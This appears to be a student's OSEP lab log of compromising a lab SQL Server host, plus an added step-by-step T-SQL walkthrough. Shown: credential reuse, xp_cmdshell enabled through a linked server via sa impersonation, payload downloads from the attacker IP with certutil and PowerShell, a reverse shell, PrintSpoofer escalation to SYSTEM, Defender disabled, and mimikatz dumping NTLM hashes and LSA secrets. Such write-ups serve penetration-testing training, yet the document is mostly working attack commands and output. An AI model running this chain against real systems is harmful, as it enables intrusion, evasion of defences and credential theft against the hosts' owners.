proxychains4 impacket-mssqlclient tommy:89dsfsji43A@172.16.243.187 -port 1433 -windows-auth

┌──(kali㉿kali)-[~/Documents/OSEP/ch6]
└─$ proxychains4 impacket-mssqlclient tommy:89dsfsji43A@172.16.243.187 -port 1433 -windows-auth
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
[proxychains] DLL init: proxychains-ng 4.16
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.243.187:1433  ...  OK
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(SQL03\\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(SQL03\\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL> **enable_xp_cmdshell**
**[-] ERROR(SQL03\\SQLEXPRESS): Line 105: User does not have permission to perform this action.
[-] ERROR(SQL03\\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.
[-] ERROR(SQL03\\SQLEXPRESS): Line 62: The configuration option 'xp_cmdshell' does not exist, or it may be an advanced option.
[-] ERROR(SQL03\\SQLEXPRESS): Line 1: You do not have permission to run the RECONFIGURE statement.**

proxychains4 crackmapexec smb 172.16.243.187 -u tommy -p '89dsfsji43A'

┌──(kali㉿kali)-[~/Documents/OSEP/ch6]
└─$ proxychains4 crackmapexec smb 172.16.243.187 -u tommy -p '89dsfsji43A'
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.16
/usr/lib/python3/dist-packages/pywerview/requester.py:144: SyntaxWarning: "is not" with a literal. Did you mean "!="?
  if result['type'] is not 'searchResEntry':
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.243.187:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.243.187:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.243.187:135 <--socket error or timeout!
**SMB         172.16.243.187  445    SQL03            [*] Windows 10.0 Build 17763 (name:SQL03) (domain:final.com) (signing:False) (SMBv1:False)**
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.243.187:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.243.187:445  ...  OK
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  172.16.243.187:445  ...  OK
SMB         172.16.243.187  445    SQL03            [+] final.com\\tommy:89dsfsji43A

Reverse shell coming back from the MSSQL on 172.16.243.194

┌──(kali㉿kali)-[~/Documents/OSEP/ch6]
└─$ nc -lvnp 80                                                           130 ⨯
listening on [any] 80 ...
connect to [192.168.49.243] from (UNKNOWN) [192.168.243.189] 62068
Microsoft Windows [Version 10.0.17763.1518]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\\Windows\\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 172.16.243.187
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 172.16.243.254

C:\\Windows\\system32>hostname
hostname
sql03

C:\\Windows\\system32>whoami        
whoami
final\\sqlsvc03

C:\\Windows\\system32>cd c:\\Users\\sqlsvc03\\Desktop
cd c:\\Users\\sqlsvc03\\Desktop

c:\\Users\\sqlsvc03\\Desktop>more local.txt
more local.txt
299ca8cec8c772177e8103aa21363b63

c:\\Users\\sqlsvc03\\Desktop>

c:\\Users\\sqlsvc03\\Desktop>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeManageVolumePrivilege       Perform volume maintenance tasks          Enabled 
**SeImpersonatePrivilege        Impersonate a client after authentication Enabled** 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

Downloading the file directly does not complete:

c:\\Users\\sqlsvc03\\Desktop>certutil.exe -urlcache -f <http://192.168.49.243/SpoolSample_x64.exe> SpoolSample_x64.exe
certutil.exe -urlcache -f <http://192.168.49.243/SpoolSample_x64.exe> SpoolSample_x64.exe
Access is denied.

c:\\Users\\sqlsvc03\\Desktop>cd c:\\windows\\tasks
cd c:\\windows\\tasks

c:\\Windows\\Tasks>certutil.exe -urlcache -f <http://192.168.49.243/SpoolSample_x64.exe> SpoolSample_x64.exe
certutil.exe -urlcache -f <http://192.168.49.243/SpoolSample_x64.exe> SpoolSample_x64.exe
Access is denied.

Download it through MSSQL instead:

EXECUTE as LOGIN = 'sa';EXEC sp_serveroption 'SQL03', 'rpc out', 'true';EXEC ('sp_configure ''show advanced options'', 1; RECONFIGURE; EXEC sp_configure ''xp_cmdshell'', 1;RECONFIGURE;') AT SQL03;EXEC('xp_cmdshell ''powershell.exe iwr -uri http://192.168.49.243/PrintSpoofer.exe -o c:\\windows\\tasks\\PrintSpoofer.exe'';') AT SQL03

EXECUTE as LOGIN = 'sa';EXEC sp_serveroption 'SQL03', 'rpc out', 'true';EXEC ('sp_configure ''show advanced options'', 1; RECONFIGURE; EXEC sp_configure ''xp_cmdshell'', 1;RECONFIGURE;') AT SQL03;EXEC('xp_cmdshell ''powershell.exe iwr -uri http://192.168.49.243/SpoolSample_x64.exe -o c:\\windows\\tasks\\SpoolSample_x64.exe'';') AT SQL03

c:\\Windows\\Tasks>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 1A6E-76A0

 Directory of c:\\Windows\\Tasks

08/04/2022  01:43 AM    <DIR>          .
08/04/2022  01:43 AM    <DIR>          ..
08/04/2022  01:42 AM             7,680 PrintSpoofer.exe
08/04/2022  01:19 AM             5,632 revshell.exe
08/04/2022  01:43 AM           151,040 SpoolSample_x64.exe
               3 File(s)        164,352 bytes
               2 Dir(s)   6,136,041,472 bytes free
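The two one-liners above pack impersonation, linked-server configuration and remote xp_cmdshell into a single line. The following is an added example, not part of the original notes, that spells the same chain out step by step in T-SQL and adds the enumeration queries that tell you in advance whether it can work: that the current login may impersonate sa, that a linked server named SQL03 exists, and whether RPC OUT is already enabled on it. It is meant to be run, one statement per line, in impacket-mssqlclient against the SQL Server instance that holds the link to SQL03. The listener URL is the one from the notes; the login name sa, the link name SQL03 and the writable C:\Windows\Tasks staging directory are assumed to match the lab.

```sql
-- Added example (not from the original notes): enumerate, then enable xp_cmdshell
-- on the linked server SQL03 step by step, and put the configuration back.
-- Assumptions: the current login holds IMPERSONATE on 'sa', a linked server
-- named SQL03 exists, and http://192.168.49.243 is our own listener.

-- 1. Who am I, and am I already sysadmin here? (in the notes: tommy, 0)
SELECT SYSTEM_USER AS login_name, IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;

-- 2. Which logins may be impersonated, and by whom? A row granting IMPERSONATE
--    on 'sa' is what makes EXECUTE AS LOGIN = 'sa' below succeed.
SELECT grantor.name AS can_impersonate, grantee.name AS granted_to,
       pe.permission_name, pe.state_desc
FROM sys.server_permissions AS pe
JOIN sys.server_principals AS grantor ON pe.grantor_principal_id = grantor.principal_id
JOIN sys.server_principals AS grantee ON pe.grantee_principal_id = grantee.principal_id
WHERE pe.permission_name = 'IMPERSONATE';

-- 3. Linked servers, and whether RPC OUT (required for EXEC ... AT) is on yet.
SELECT name, product, provider, data_source,
       is_rpc_out_enabled, is_data_access_enabled
FROM sys.servers
WHERE is_linked = 1;

-- 4. Become sa for the rest of this connection (impacket keeps the session open,
--    so the impersonation persists across the following lines).
EXECUTE AS LOGIN = 'sa';
SELECT SYSTEM_USER AS now_running_as, IS_SRVROLEMEMBER('sysadmin') AS is_sysadmin;  -- expect sa, 1

-- 5. EXEC ... AT <link> needs RPC OUT on the link; switch it on if step 3 showed 0.
--    (ALTER ANY LINKED SERVER is required, which sysadmin has.)
EXEC sp_serveroption @server = 'SQL03', @optname = 'rpc out', @optvalue = 'true';

-- 6. Check what the link's login maps to on the far side BEFORE touching
--    configuration there: sp_configure/RECONFIGURE need sysadmin on SQL03 too.
EXEC ('SELECT SYSTEM_USER AS remote_login, IS_SRVROLEMEMBER(''sysadmin'') AS remote_sysadmin;') AT SQL03;

-- 7. Enable xp_cmdshell on SQL03. 'show advanced options' must be on (and
--    reconfigured) before 'xp_cmdshell' becomes a visible option.
EXEC ('EXEC sp_configure ''show advanced options'', 1; RECONFIGURE;') AT SQL03;
EXEC ('EXEC sp_configure ''xp_cmdshell'', 1; RECONFIGURE;') AT SQL03;

-- 8. Stage the file. xp_cmdshell runs as SQL03's service account, so the
--    destination must be writable for it; C:\Windows\Tasks was in the notes.
--    Inside EXEC('...') every single quote is doubled; the double quotes for
--    powershell -c pass through unchanged.
EXEC ('EXEC xp_cmdshell ''powershell.exe -c "iwr -Uri http://192.168.49.243/PrintSpoofer.exe -OutFile C:\Windows\Tasks\PrintSpoofer.exe"'';') AT SQL03;
EXEC ('EXEC xp_cmdshell ''dir C:\Windows\Tasks'';') AT SQL03;

-- 9. Revert once the file is on disk: xp_cmdshell left enabled is a finding of
--    its own, and the next tester (or the blue team) will notice it.
EXEC ('EXEC sp_configure ''xp_cmdshell'', 0; RECONFIGURE; EXEC sp_configure ''show advanced options'', 0; RECONFIGURE;') AT SQL03;
REVERT;
```

Step 6 is the check that explains the rest of the writeup: whatever the link's login maps to on SQL03 is the account xp_cmdshell runs under there, and the link here lands on a sysadmin whose commands execute as the SQL Server service account. That is why the shell that comes back is final\sqlsvc03 and not tommy, and why the first direct attempt at enable_xp_cmdshell as tommy failed on SQL03 itself.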

Privilege escalation:

c:\\Windows\\Tasks>**PrintSpoofer.exe \\\\.\\pipe\\test\\pipe\\spoolss c:\\Windows\\Tasks\\revshell.exe**
PrintSpoofer.exe \\\\.\\pipe\\test\\pipe\\spoolss c:\\Windows\\Tasks\\revshell.exe
Waiting for client to connect to named pipe...

c:\\Windows\\Tasks>hostname
hostname
sql03

c:\\Windows\\Tasks>**SpoolSample_x64.exe sql03 sql03/pipe/test**
SpoolSample_x64.exe sql03 sql03/pipe/test
[+] Converted DLL to shellcode
[+] Executing RDI
[+] Calling exported function

c:\\Windows\\Tasks>PrintSpoofer.exe \\\\.\\pipe\\test\\pipe\\spoolss c:\\Windows\\Tasks\\revshell.exe
PrintSpoofer.exe \\\\.\\pipe\\test\\pipe\\spoolss c:\\Windows\\Tasks\\revshell.exe
Waiting for client to connect to named pipe...
Impersonated user is: NT AUTHORITY\\SYSTEM.
Executed 'c:\\Windows\\Tasks\\revshell.exe' with impersonated token!
┌──(kali㉿kali)-[~/Documents/OSEP/ch6]
└─$ nc -lvnp 80
listening on [any] 80 ...
connect to [192.168.49.243] from (UNKNOWN) [192.168.243.189] 62129
Microsoft Windows [Version 10.0.17763.1518]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\\Windows\\system32>whoami
whoami
nt authority\\system

C:\\Windows\\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : 
   IPv4 Address. . . . . . . . . . . : 172.16.243.187
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 172.16.243.254

C:\\Windows\\system32>cd c:\\Users\\Administrator\\Desktop
cd c:\\Users\\Administrator\\Desktop

c:\\Users\\Administrator\\Desktop>more proof.txt
more proof.txt
ec8dce67fea16d638ade1419bfe3526e

c:\\Users\\Administrator\\Desktop>powershell -exec bypass -c "Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -Verbose"
powershell -exec bypass -c "Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -Verbose"
VERBOSE: Performing operation 'Update MSFT_MpPreference' on Target 'ProtectionManagement'.

c:\\Users\\Administrator\\Desktop>certutil.exe -urlcache -f <http://192.168.49.243/mimikatz.exe> mimikatz.exe
certutil.exe -urlcache -f <http://192.168.49.243/mimikatz.exe> mimikatz.exe
****  Online  ****
CertUtil: -URLCache command completed successfully.

c:\\Users\\Administrator\\Desktop>mimikatz.exe "sekurlsa::logonPasswords" "exit"
mimikatz.exe "sekurlsa::logonPasswords" "exit"

  .#####.   mimikatz 2.2.0 (x64) #18362 Jan  4 2020 18:59:26
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \\ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \\ / ##       > <http://blog.gentilkiwi.com/mimikatz>
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > <http://pingcastle.com> / <http://mysmartlogon.com>   ***/

mimikatz(commandline) # sekurlsa::logonPasswords

Authentication Id : 0 ; 1505670 (00000000:0016f986)
Session           : Service from 0
User Name         : sqlsvc03
Domain            : FINAL
Logon Server      : DC01
Logon Time        : 8/3/2022 11:59:38 PM
SID               : S-1-5-21-1725955968-4040474791-670206374-1113
	msv :	
	 [00000003] Primary
	 * Username : sqlsvc03
	 * Domain   : FINAL
	 * NTLM     : 77f944ff6e0c0ed0c83dcef57bdf9298
	 * SHA1     : 747df671015d1ec1c50ffc38f4ecc97b7ead8c32
	 * DPAPI    : 17aa3dc68e3e67783ace602437ee352c
	tspkg :	
	wdigest :	
	 * Username : sqlsvc03
	 * Domain   : FINAL
	 * Password : (null)
	kerberos :	
	 * Username : sqlsvc03
	 * Domain   : FINAL.COM
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 655864 (00000000:000a01f8)
Session           : Interactive from 0
User Name         : setup
Domain            : SQL03
Logon Server      : SQL03
Logon Time        : 8/3/2022 11:58:37 PM
SID               : S-1-5-21-4076639736-4188291740-2971731876-1001
	msv :	
	 [00000003] Primary
	 * Username : setup
	 * Domain   : SQL03
	 * NTLM     : 1fd7eecf8c3c358597ffe32797ed01e9
	 * SHA1     : d39aa8a081c1c3c8c36167274a4c9f55e3bf3163
	tspkg :	
	wdigest :	
	 * Username : setup
	 * Domain   : SQL03
	 * Password : (null)
	kerberos :	
	 * Username : setup
	 * Domain   : SQL03
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 542074 (00000000:0008457a)
Session           : Interactive from 0
User Name         : setup
Domain            : SQL03
Logon Server      : SQL03
Logon Time        : 12/29/2021 11:30:25 PM
SID               : S-1-5-21-4076639736-4188291740-2971731876-1001
	msv :	
	 [00000003] Primary
	 * Username : setup
	 * Domain   : SQL03
	 * NTLM     : 1fd7eecf8c3c358597ffe32797ed01e9
	 * SHA1     : d39aa8a081c1c3c8c36167274a4c9f55e3bf3163
	tspkg :	
	wdigest :	
	 * Username : setup
	 * Domain   : SQL03
	 * Password : (null)
	kerberos :	
	 * Username : setup
	 * Domain   : SQL03
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 107096 (00000000:0001a258)
Session           : Service from 0
User Name         : SQLTELEMETRY$SQLEXPRESS
Domain            : NT Service
Logon Server      : (null)
Logon Time        : 12/29/2021 11:21:23 PM
SID               : S-1-5-80-1985561900-798682989-2213159822-1904180398-3434236965
	msv :	
	 [00000003] Primary
	 * Username : SQL03$
	 * Domain   : FINAL
	 * NTLM     : c52a092a8e12c89fda86819b12f06a06
	 * SHA1     : 204368033a4dcbfb1eb8c2cd3803bce84009c83a
	tspkg :	
	wdigest :	
	 * Username : SQL03$
	 * Domain   : FINAL
	 * Password : (null)
	kerberos :	
	 * Username : SQL03$
	 * Domain   : final.com
	 * Password : f7 2e 44 5b b9 f8 a0 ad 45 77 00 b1 da 60 21 99 49 a0 b0 63 a8 3b ff 27 de 77 f7 e5 eb ed b8 7b 2a 20 46 10 46 51 64 9c b8 ea f3 01 2c e5 03 d8 69 ce 1b 16 f9 20 52 d7 7d b4 65 2d d5 e0 e0 c2 53 01 91 eb fc 63 c2 9d 57 63 6e 12 33 d7 07 7d 02 b9 8f 58 54 00 4c 76 58 aa 5e c0 c2 50 56 15 3a 03 81 69 b5 b2 f2 bd 78 d1 22 68 1d 1d e8 df 37 12 4b 70 c0 1d d8 42 b4 81 16 6e 42 8b 3c 83 4c fc 58 84 d5 05 47 a2 cd 6b 3f 42 f9 09 ec 1f 8a d6 d7 00 77 58 f2 f1 b5 57 f5 b3 d8 f0 18 4d 19 13 4d f6 3e d9 df 6b 62 42 3f f2 0b c9 b0 6f 90 ec fa 19 6f ee da 39 d2 94 42 20 64 25 8e ba 76 3d 01 92 ea 36 62 4d d8 ce 3b 6b 4d 56 60 b8 0d 0d cb d1 df e6 56 0b da b8 9a ef 6d ed 90 de d6 e0 a3 3f ac 63 c6 66 16 e5 f4 70 58 99 97 fc 
	ssp :	
	credman :	

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : SQL03$
Domain            : FINAL
Logon Server      : (null)
Logon Time        : 12/29/2021 11:21:20 PM
SID               : S-1-5-20
	msv :	
	 [00000003] Primary
	 * Username : SQL03$
	 * Domain   : FINAL
	 * NTLM     : c52a092a8e12c89fda86819b12f06a06
	 * SHA1     : 204368033a4dcbfb1eb8c2cd3803bce84009c83a
	tspkg :	
	wdigest :	
	 * Username : SQL03$
	 * Domain   : FINAL
	 * Password : (null)
	kerberos :	
	 * Username : sql03$
	 * Domain   : FINAL.COM
	 * Password : f7 2e 44 5b b9 f8 a0 ad 45 77 00 b1 da 60 21 99 49 a0 b0 63 a8 3b ff 27 de 77 f7 e5 eb ed b8 7b 2a 20 46 10 46 51 64 9c b8 ea f3 01 2c e5 03 d8 69 ce 1b 16 f9 20 52 d7 7d b4 65 2d d5 e0 e0 c2 53 01 91 eb fc 63 c2 9d 57 63 6e 12 33 d7 07 7d 02 b9 8f 58 54 00 4c 76 58 aa 5e c0 c2 50 56 15 3a 03 81 69 b5 b2 f2 bd 78 d1 22 68 1d 1d e8 df 37 12 4b 70 c0 1d d8 42 b4 81 16 6e 42 8b 3c 83 4c fc 58 84 d5 05 47 a2 cd 6b 3f 42 f9 09 ec 1f 8a d6 d7 00 77 58 f2 f1 b5 57 f5 b3 d8 f0 18 4d 19 13 4d f6 3e d9 df 6b 62 42 3f f2 0b c9 b0 6f 90 ec fa 19 6f ee da 39 d2 94 42 20 64 25 8e ba 76 3d 01 92 ea 36 62 4d d8 ce 3b 6b 4d 56 60 b8 0d 0d cb d1 df e6 56 0b da b8 9a ef 6d ed 90 de d6 e0 a3 3f ac 63 c6 66 16 e5 f4 70 58 99 97 fc 
	ssp :	
	credman :	

Authentication Id : 0 ; 35035 (00000000:000088db)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 12/29/2021 11:21:19 PM
SID               : S-1-5-96-0-0
	msv :	
	 [00000003] Primary
	 * Username : SQL03$
	 * Domain   : FINAL
	 * NTLM     : c52a092a8e12c89fda86819b12f06a06
	 * SHA1     : 204368033a4dcbfb1eb8c2cd3803bce84009c83a
	tspkg :	
	wdigest :	
	 * Username : SQL03$
	 * Domain   : FINAL
	 * Password : (null)
	kerberos :	
	 * Username : SQL03$
	 * Domain   : final.com
	 * Password : f7 2e 44 5b b9 f8 a0 ad 45 77 00 b1 da 60 21 99 49 a0 b0 63 a8 3b ff 27 de 77 f7 e5 eb ed b8 7b 2a 20 46 10 46 51 64 9c b8 ea f3 01 2c e5 03 d8 69 ce 1b 16 f9 20 52 d7 7d b4 65 2d d5 e0 e0 c2 53 01 91 eb fc 63 c2 9d 57 63 6e 12 33 d7 07 7d 02 b9 8f 58 54 00 4c 76 58 aa 5e c0 c2 50 56 15 3a 03 81 69 b5 b2 f2 bd 78 d1 22 68 1d 1d e8 df 37 12 4b 70 c0 1d d8 42 b4 81 16 6e 42 8b 3c 83 4c fc 58 84 d5 05 47 a2 cd 6b 3f 42 f9 09 ec 1f 8a d6 d7 00 77 58 f2 f1 b5 57 f5 b3 d8 f0 18 4d 19 13 4d f6 3e d9 df 6b 62 42 3f f2 0b c9 b0 6f 90 ec fa 19 6f ee da 39 d2 94 42 20 64 25 8e ba 76 3d 01 92 ea 36 62 4d d8 ce 3b 6b 4d 56 60 b8 0d 0d cb d1 df e6 56 0b da b8 9a ef 6d ed 90 de d6 e0 a3 3f ac 63 c6 66 16 e5 f4 70 58 99 97 fc 
	ssp :	
	credman :	

Authentication Id : 0 ; 34991 (00000000:000088af)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 12/29/2021 11:21:19 PM
SID               : S-1-5-96-0-1
	msv :	
	 [00000003] Primary
	 * Username : SQL03$
	 * Domain   : FINAL
	 * NTLM     : c52a092a8e12c89fda86819b12f06a06
	 * SHA1     : 204368033a4dcbfb1eb8c2cd3803bce84009c83a
	tspkg :	
	wdigest :	
	 * Username : SQL03$
	 * Domain   : FINAL
	 * Password : (null)
	kerberos :	
	 * Username : SQL03$
	 * Domain   : final.com
	 * Password : f7 2e 44 5b b9 f8 a0 ad 45 77 00 b1 da 60 21 99 49 a0 b0 63 a8 3b ff 27 de 77 f7 e5 eb ed b8 7b 2a 20 46 10 46 51 64 9c b8 ea f3 01 2c e5 03 d8 69 ce 1b 16 f9 20 52 d7 7d b4 65 2d d5 e0 e0 c2 53 01 91 eb fc 63 c2 9d 57 63 6e 12 33 d7 07 7d 02 b9 8f 58 54 00 4c 76 58 aa 5e c0 c2 50 56 15 3a 03 81 69 b5 b2 f2 bd 78 d1 22 68 1d 1d e8 df 37 12 4b 70 c0 1d d8 42 b4 81 16 6e 42 8b 3c 83 4c fc 58 84 d5 05 47 a2 cd 6b 3f 42 f9 09 ec 1f 8a d6 d7 00 77 58 f2 f1 b5 57 f5 b3 d8 f0 18 4d 19 13 4d f6 3e d9 df 6b 62 42 3f f2 0b c9 b0 6f 90 ec fa 19 6f ee da 39 d2 94 42 20 64 25 8e ba 76 3d 01 92 ea 36 62 4d d8 ce 3b 6b 4d 56 60 b8 0d 0d cb d1 df e6 56 0b da b8 9a ef 6d ed 90 de d6 e0 a3 3f ac 63 c6 66 16 e5 f4 70 58 99 97 fc 
	ssp :	
	credman :	

Authentication Id : 0 ; 33774 (00000000:000083ee)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 12/29/2021 11:21:19 PM
SID               : 
	msv :	
	 [00000003] Primary
	 * Username : SQL03$
	 * Domain   : FINAL
	 * NTLM     : c52a092a8e12c89fda86819b12f06a06
	 * SHA1     : 204368033a4dcbfb1eb8c2cd3803bce84009c83a
	tspkg :	
	wdigest :	
	kerberos :	
	ssp :	
	credman :	

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 12/29/2021 11:21:21 PM
SID               : S-1-5-19
	msv :	
	tspkg :	
	wdigest :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	kerberos :	
	 * Username : (null)
	 * Domain   : (null)
	 * Password : (null)
	ssp :	
	credman :	

Authentication Id : 0 ; 53784 (00000000:0000d218)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 12/29/2021 11:21:20 PM
SID               : S-1-5-90-0-1
	msv :	
	 [00000003] Primary
	 * Username : SQL03$
	 * Domain   : FINAL
	 * NTLM     : c52a092a8e12c89fda86819b12f06a06
	 * SHA1     : 204368033a4dcbfb1eb8c2cd3803bce84009c83a
	tspkg :	
	wdigest :	
	 * Username : SQL03$
	 * Domain   : FINAL
	 * Password : (null)
	kerberos :	
	 * Username : SQL03$
	 * Domain   : final.com
	 * Password : f7 2e 44 5b b9 f8 a0 ad 45 77 00 b1 da 60 21 99 49 a0 b0 63 a8 3b ff 27 de 77 f7 e5 eb ed b8 7b 2a 20 46 10 46 51 64 9c b8 ea f3 01 2c e5 03 d8 69 ce 1b 16 f9 20 52 d7 7d b4 65 2d d5 e0 e0 c2 53 01 91 eb fc 63 c2 9d 57 63 6e 12 33 d7 07 7d 02 b9 8f 58 54 00 4c 76 58 aa 5e c0 c2 50 56 15 3a 03 81 69 b5 b2 f2 bd 78 d1 22 68 1d 1d e8 df 37 12 4b 70 c0 1d d8 42 b4 81 16 6e 42 8b 3c 83 4c fc 58 84 d5 05 47 a2 cd 6b 3f 42 f9 09 ec 1f 8a d6 d7 00 77 58 f2 f1 b5 57 f5 b3 d8 f0 18 4d 19 13 4d f6 3e d9 df 6b 62 42 3f f2 0b c9 b0 6f 90 ec fa 19 6f ee da 39 d2 94 42 20 64 25 8e ba 76 3d 01 92 ea 36 62 4d d8 ce 3b 6b 4d 56 60 b8 0d 0d cb d1 df e6 56 0b da b8 9a ef 6d ed 90 de d6 e0 a3 3f ac 63 c6 66 16 e5 f4 70 58 99 97 fc 
	ssp :	
	credman :	

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : SQL03$
Domain            : FINAL
Logon Server      : (null)
Logon Time        : 12/29/2021 11:21:19 PM
SID               : S-1-5-18
	msv :	
	tspkg :	
	wdigest :	
	 * Username : SQL03$
	 * Domain   : FINAL
	 * Password : (null)
	kerberos :	
	 * Username : sql03$
	 * Domain   : FINAL.COM
	 * Password : f7 2e 44 5b b9 f8 a0 ad 45 77 00 b1 da 60 21 99 49 a0 b0 63 a8 3b ff 27 de 77 f7 e5 eb ed b8 7b 2a 20 46 10 46 51 64 9c b8 ea f3 01 2c e5 03 d8 69 ce 1b 16 f9 20 52 d7 7d b4 65 2d d5 e0 e0 c2 53 01 91 eb fc 63 c2 9d 57 63 6e 12 33 d7 07 7d 02 b9 8f 58 54 00 4c 76 58 aa 5e c0 c2 50 56 15 3a 03 81 69 b5 b2 f2 bd 78 d1 22 68 1d 1d e8 df 37 12 4b 70 c0 1d d8 42 b4 81 16 6e 42 8b 3c 83 4c fc 58 84 d5 05 47 a2 cd 6b 3f 42 f9 09 ec 1f 8a d6 d7 00 77 58 f2 f1 b5 57 f5 b3 d8 f0 18 4d 19 13 4d f6 3e d9 df 6b 62 42 3f f2 0b c9 b0 6f 90 ec fa 19 6f ee da 39 d2 94 42 20 64 25 8e ba 76 3d 01 92 ea 36 62 4d d8 ce 3b 6b 4d 56 60 b8 0d 0d cb d1 df e6 56 0b da b8 9a ef 6d ed 90 de d6 e0 a3 3f ac 63 c6 66 16 e5 f4 70 58 99 97 fc 
	ssp :	
	credman :	

mimikatz(commandline) # exit
Bye!

c:\\Users\\Administrator\\Desktop>mimikatz.exe "privilege::debug" "token::elevate" "lsadump::secrets" "exit"
mimikatz.exe "sekurlsa::logonPasswords" "exit"mimikatz.exe "privilege::debug" "token::elevate" "lsadump::secrets" "exit"

  .#####.   mimikatz 2.2.0 (x64) #18362 Jan  4 2020 18:59:26
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \\ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \\ / ##       > <http://blog.gentilkiwi.com/mimikatz>
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > <http://pingcastle.com> / <http://mysmartlogon.com>   ***/

mimikatz(commandline) # exitmimikatz.exe
ERROR mimikatz_doLocal ; "exitmimikatz.exe" command of "standard" module not found !

Module :	standard
Full name :	Standard module
Description :	Basic commands (does not require module name)

            exit  -  Quit mimikatz
             cls  -  Clear screen (doesn't work with redirections, like PsExec)
          answer  -  Answer to the Ultimate Question of Life, the Universe, and Everything
          coffee  -  Please, make me a coffee!
           sleep  -  Sleep an amount of milliseconds
             log  -  Log mimikatz input/output to file
          base64  -  Switch file input/output base64
         version  -  Display some version informations
              cd  -  Change or display current directory
       localtime  -  Displays system local date and time (OJ command)
        hostname  -  Displays system local hostname

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # token::elevate
Token Id  : 0
User name : 
SID name  : NT AUTHORITY\\SYSTEM

496	{0;000003e7} 1 D 29104     	NT AUTHORITY\\SYSTEM	S-1-5-18	(04g,21p)	Primary
 -> Impersonated !
 * Process Token : {0;000003e7} 0 D 3324420   	NT AUTHORITY\\SYSTEM	S-1-5-18	(04g,31p)	Primary
 * Thread Token  : {0;000003e7} 1 D 3351614   	NT AUTHORITY\\SYSTEM	S-1-5-18	(04g,21p)	Impersonation (Delegation)

mimikatz(commandline) # lsadump::secrets
Domain : SQL03
SysKey : 562deb73c83d0df88f596eb89103d27d

Local name : SQL03 ( S-1-5-21-4076639736-4188291740-2971731876 )
Domain name : FINAL ( S-1-5-21-1725955968-4040474791-670206374 )
Domain FQDN : final.com

Policy subsystem is : 1.18
LSA Key(s) : 1, default {f2b4134f-b603-24ed-8f97-dc175179f8de}
  [00] {f2b4134f-b603-24ed-8f97-dc175179f8de} e37f84f177cb60768f3bb3686f725cd328c9bdbcd33f998e04f0fc6748c4e576

Secret  : $MACHINE.ACC
